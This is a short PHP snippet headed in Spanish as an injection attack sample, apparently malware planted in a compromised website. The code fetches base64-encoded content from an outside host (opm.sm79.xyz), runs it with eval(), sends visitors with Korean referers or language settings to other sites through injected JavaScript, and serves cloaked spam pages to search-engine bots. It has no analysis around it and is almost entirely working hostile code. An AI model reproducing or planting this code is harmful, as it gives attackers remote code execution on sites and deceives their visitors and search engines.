Inyección 3 - Código accesible - Ataque

if (strpos(strtolower(@$_SERVER['HTTP_REFERER']), ".kr") !== false || strpos(strtolower(@$_SERVER['HTTP_ACCEPT_LANGUAGE']), "ko") !== false) {
    $local_url = _local_url();
    $html = base64_decode(_get_between(_get_cache('http://opm.sm79.xyz/api.php?g=gitt'), "->|", "|<-"));
    eval($html);
    $Data_arr = _get_static_arr($local_url . 'Data_arr', $Main_arr["data"]);
    $sc_arr = explode('|', _get_static_arr($local_url . "sitel1", $Data_arr['site']));
    die('<!DOCTYPE html><html><body><script>document.location=("' . @trim($sc_arr[0]) . '");</script></body></html>');
}
function _get_static_arr($str, $arr) {
    return ($arr[hashCode($str) % count($arr) ]);
}
if (isBot()) {
    $base = _base_url();
    $local_url = _local_url();
    $html = base64_decode(_get_between(_get_cache('http://opm.sm79.xyz/api.php?g=gitt'), "->|", "|<-"));
    eval($html);
    $Data_arr = _get_static_arr($local_url . 'Data_arr', $Main_arr["data"]);
    $Data_arr = array_merge($Data_arr, $Main_arr["common"]);
    $git = $Main_arr["git"];
    $html_m = base64_decode(_get_between(_get_cache($git . (hashCode(_local_url()) % 500 + 1) . '.txt'), "->|", "|<-"));
    $html_m = content_process($html_m, $Data_arr);
    $s = strpos($html_m, '[search]');
    while ($s !== false) {
        $seed = rand_str();
        $content = content_process($Main_arr["search"]["rule"][mt_rand(0, count($Main_arr["search"]["rule"]) - 1) ], $Data_arr, true);
        $hurl = str_ireplace('[content]', urlencode($content), $Main_arr["search"]["data"][mt_rand(0, count($Main_arr["search"]["data"]) - 1) ]);
        $html_m = substr_replace($html_m, "<a href=\"" . $hurl . "\">" . $content . "</a>", $s, strlen('[search]'));
        $s = strpos($html_m, '[search]');
    }
    die($html_m);
}